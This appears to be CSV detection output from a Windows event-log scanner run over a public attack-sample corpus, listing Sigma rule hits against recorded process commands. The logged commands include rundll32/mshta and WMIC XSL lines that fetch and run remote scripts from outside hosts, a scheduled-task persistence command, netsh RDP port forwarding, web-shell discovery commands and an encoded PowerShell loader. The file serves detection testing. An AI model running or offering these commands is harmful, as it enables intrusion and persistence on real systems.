Creation,"Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:57.867 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:59.769 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR ""mshta.exe https://hotelesms.com/Injection.txt"" /F : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:59.769 +09:00,IEWIN7,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:59.769 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 13:02:11.307 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:1600 CREDAT:275470 /prefetch:2",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx -2019-05-24 01:49:05.736 +09:00,IEWIN7,1,informational,Process Creation,"Command: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx -2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx -2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx -2019-05-24 01:49:07.731 +09:00,IEWIN7,11,high,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx -2019-05-24 01:49:08.422 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx -2019-05-24 01:50:44.582 +09:00,IEWIN7,1,informational,Process Creation,Command: wmiadap.exe /F /T /R : Path: C:\Windows\System32\wbem\WMIADAP.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx -2019-05-24 02:26:08.716 +09:00,IEWIN7,1,informational,Process Creation,"Command: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat : Path: \\vboxsrv\HTools\msxsl.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx -2019-05-24 02:26:08.716 +09:00,IEWIN7,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx -2019-05-24 02:26:09.437 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx -2019-05-24 02:45:34.538 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx -2019-05-24 02:46:04.671 +09:00,IEWIN7,1,informational,Process Creation,"Command: netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5 : Path: C:\Windows\System32\netsh.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx -2019-05-24 02:46:04.671 +09:00,IEWIN7,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx -2019-05-24 02:46:04.671 +09:00,IEWIN7,1,high,Netsh RDP Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd_3389.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx -2019-05-24 10:33:53.112 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\windows\system32\cmd.exe"" /c net user : Path: C:\Windows\System32\cmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.112 +09:00,IEWIN7,1,high,Shells Spawned by Web Servers,,rules/sigma/process_creation/win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.122 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.182 +09:00,IEWIN7,1,informational,Process Creation,"Command: net user : Path: C:\Windows\System32\net.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""c:\windows\system32\cmd.exe"" /c net user",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.192 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\net1 user : Path: C:\Windows\System32\net1.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: net user,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-26 13:01:42.385 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" : Path: C:\Users\IEUser\Desktop\info.rar\jjs.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx -2019-05-26 13:01:42.966 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" : Path: C:\Users\IEUser\Desktop\info.rar\jjs.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx -2019-05-26 13:01:43.567 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\svchost.exe : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx -2019-05-26 13:01:43.567 +09:00,IEWIN7,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx -2019-05-26 13:01:43.567 +09:00,IEWIN7,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx -2019-05-26 13:01:43.567 +09:00,IEWIN7,1,critical,Suspect Svchost Activity,,rules/sigma/process_creation/win_susp_svchost_no_cli.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx -2019-05-27 00:47:56.667 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\System32\notepad.exe : Path: C:\Windows\System32\notepad.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:47:56.667 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:47:56.727 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:47:57.628 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:48:00.752 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:48:01.864 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 10:28:42.711 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:28:42.711 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Shells Spawned by Web Servers,,rules/sigma/process_creation/win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.000 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\InetSRV\appcmd.exe"" list vdir /text:physicalpath : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAG